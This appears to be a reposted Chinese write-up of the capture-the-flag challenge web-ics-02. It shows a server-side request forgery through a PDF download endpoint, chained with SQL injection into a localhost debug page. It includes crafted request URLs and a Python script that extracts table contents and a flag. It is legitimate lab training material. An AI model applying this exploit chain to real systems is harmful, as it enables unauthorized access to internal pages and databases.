2. 程式人生 > 實用技巧 >攻防世界-web-ics-02(sql注入、ssrf、目錄掃描)

攻防世界-web-ics-02(sql注入、ssrf、目錄掃描)

阿新 發佈:2020-12-07

題目來源:XCTF 4th-CyberEarth
題目描述:工控雲管理系統的文件中心頁面,存在不易被發現的漏洞。

進入場景,如下,頁面有一個下載功能(點選paper),下載功能只能下載pdf檔案,會在dl引數加上.pdf。

目錄掃描可以得到secret目錄,該目錄檔案會被列出來。有兩個檔案,一個是secret.php一個是secret_debug.php。可以聯想到secret_debug是secret檔案的除錯檔案。

訪問secret.php檔案時,顯示如下,頁面提示“這裡是私密頁面1”,猜想還有私密頁面2。檢視頁面元素,發現頁面中有一個隱藏引數s,預設值為2

fuzz一下,發現s=3時,返回私密頁面2

當直接訪問secret_debug檔案的時候會提示,你的ip是多少,不能訪問。

聯想到ssrf漏洞,剛好這裡有一個下載功能,雖然只能下載pdf檔案,但是當你下載一個不存在的檔案的時候readfile函式還是會執行的。

根據secret檔案的引數可以帶入到secret_debug檔案裡面,構造一個請求測試一下

http://220.249.52.133:38789/download.php?dl=http://127.0.0.1/secret/secret_debug.php?s=3&txtfirst_name=A&txtmiddle_name=B&txtLast_name=C&txtname_suffix=D&txtdob=01/11/2019&txtdl_nmbr=9244034&txtRetypeDL=9244034

由於你的url形式是ip:port/download.php?dl=http://127.0.0.1/secret/secret_debug.php?s=3&txtfirst_name=.......這樣會導致在第一個&符號處被加上.pdf導致其餘引數無法傳入debug檔案裡面(如上圖所示),所以這裡要給特殊字元url編碼一次再請求,apache伺服器就會自動解密一次,這樣.pdf就會加在最後一個引數後面了(如下圖所示)。

http://220.249.52.133:38789/download.php?dl=http://127.0.0.1/secret/secret_debug.php?s%3D3%26txtfirst_name%3DA%26txtmiddle_name%3DB%26txtLast_name%3DC%26txtname_suffix%3DD%26txtdob%3D01%2F11%2F2019%26txtdl_nmbr%3D9244034%26txtRetypeDL%3D9244034

為了使.pdf不影響最後一個引數txtRetypeDL的值,我們可以在所有的引數之後加一個&,使.pdf加在&後,如下圖,註冊成功。系統回顯txtLast_name、txtfirst_name和txtdob引數的值。

http://220.249.52.133:38789/download.php?dl=http://127.0.0.1/secret/secret_debug.php?s%3D3%26txtfirst_name%3DA%26txtmiddle_name%3DB%26txtLast_name%3DC%26txtname_suffix%3DD%26txtdob%3D01%2F11%2F2019%26txtdl_nmbr%3D9244038%26txtRetypeDL%3D9244038%26

經過嘗試得到注入點,編寫指令碼得到flag。

import requests
import random
import urllib

url = ' http://220.249.52.133:38789/download.php'

# subquery = "database()"
# ssrfw
# subquery = "select group_concat(table_name) from information_schema.tables where table_schema='ssrfw'"
# etcYssrf,users
# subquery = "select group_concat(column_name) from information_schema.columns where table_name='cetcYssrf'"
# secretName,value
# subquery = "select secretName from cetcYssrf LIMIT 1"
# secretname -> flag
subquery = "select value from cetcYssrf LIMIT 1"
# value -> flag{cpg9ssnu_OOOOe333eetc_2018}

id = random.randint(1, 10000000)

dl = ('http://127.0.0.1/secret/secret_debug.php?' +
        urllib.parse.urlencode({
            "s": "3",
            "txtfirst_name": "A','b',("+subquery+"),'c'/*",
            "txtmiddle_name": "B",
            "txtLast_name": "C",
            "txtname_suffix": "D.",
            "txtdob": "*/,'01/10/2019",
            "txtdl_nmbr": id,
            "txtRetypeDL": id
            }) + "&")

r = requests.get(url, params={"dl": dl})
print(r.text)

參考:官方writeup

相關推薦

攻防世界-web-ics-02sql注入ssrf目錄掃描

題目來源:XCTF 4th-CyberEarth題目描述:工控雲管理系統的文件中心頁面,存在不易被發現的漏洞。

攻防世界-web-ics-07PHP弱型別linux目錄結構特性繞過檔案型別過濾)

工控雲管理系統專案管理頁面解析漏洞。 進入題目後,點選進入專案管理頁面。

攻防世界web進階

1.PHP_python_template_injection 1.題目提示python模板注入,測試http://220.249.52.133:47149/{{7+7}},發現回顯“URL http://220.249.52.133:47149/14 not found”,說明括號裡的程式碼被執行了,存在SSTI。

攻防世界 - Web進階

supersqli: !!! 1.判斷有誤注入,1\'報錯, 1’ 報錯,1’# 正常且為True,1’ and 1=1# 正常且為True,1’ and 1=2# 正常且為False,所以它裡邊存在注入

攻防世界-web-unfinishsql二次注入

題目來源:網鼎杯 2018題目描述:SQL 題目如下,是個登入頁面 通過awvs掃描得知存在register.php註冊頁面,並且註冊介面存在SQL盲注漏洞。

攻防世界-web-comment密碼爆破.git洩漏程式碼審計sql二次注入

題目來源:網鼎杯 2018題目描述:SQL密碼爆破 進入場景後,點擊發帖,輸入內容提交後,系統返回登入頁面

攻防世界-web-filemanager原始碼洩漏二次注入

題目來源:XDCTF 2015題目描述:暫無 進入介面 這題看似檔案上傳,其實主要是利用sql注入修改指定檔案在資料庫中的字尾名為空。

攻防世界-web-php_rceThinkPHP 5.0命令執行漏洞

本題進入場景後顯示如下頁面 這是一個 thinkphp 框架,先檢視版本號。在網址上隨意輸入一個不存在的模組 地址:

攻防世界-web-Web_php_wrong_nginx_config繞過登入目錄瀏覽後門利用

進入場景後,提示需要登入 嘗試開啟robots.txt頁面,發現2個隱藏頁面:hint.php和Hack.php

攻防世界-web-favorite_numberphp5.5的陣列key溢位換行符繞過正則跨行匹配inode號繞過檔名過濾檔案輸出繞過正則

進入介面 <?php //php5.5.9 $stuff = $_POST[\"stuff\"]; $array = [\'admin\', \'user\']; if($stuff === $array && $stuff[0] != \'admin\') {

攻防世界-web-Confusion1(python模板注入SSTI沙箱逃逸)

題目來源:XCTF 4th-QCTF-2018題目描述:某天,Bob說:PHP是最好的語言,但是Alice不贊同。所以Alice編寫了這個網站證明。在她還沒有寫完的時候,我發現其存在問題。(請不要使用掃描器)

攻防世界-web-love_mathbase_convert進位制轉換繞過白名單和長度限制

題目來源:CISCN題目描述:解密 進入介面 <?php error_reporting(0); //聽說你很喜歡數學,不知道你是否愛它勝過愛flag

攻防世界-web-blgdel.htaccess檔案上傳上傳+包含漏洞

題目來源:CISCN-2018-Final題目描述:暫無 開啟頁面,是一個購物網站,可以註冊登入新增購物車購買商品等。

攻防世界 - Misc進階

base64÷4: 1.下載附件,是一個.txt檔案,開啟是一串字元, 666C61677B45333342374644384133423834314341393639394544444241323442363041417D

攻防世界-Web進階-supersqli

很久之前做的題目了,現在拿到有點想不起來,記一下方法 其一:堆疊注入rename+alter

攻防世界-web PHP2

首先我們先將環境下載下來。 進入之後 ,發現一句話 Can you anthenticate to this website?大概就是在說,你能告訴我這個網站嗎?

攻防世界-web進階-Web_php_include

從程式碼中得知page中帶有php://的都會被替換成空 str_replace()以其他字元替換字串中的一些字元(區分大小寫)

Web安全-Joomla核心SQL注入漏洞利用

實驗宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!

攻防世界-web-高手進階區017-supersqli

方法一: 1.輸入1’發現不回顯,然後1’ #顯示正常,應該是存在sql注入了      

商大苦難計算機導論SQL注入

準備工作 如果只在學校的電腦上耍可以跳過; 否則的話 需要安裝VM Ware 安裝Kali Linux虛擬機器 這個教程很詳細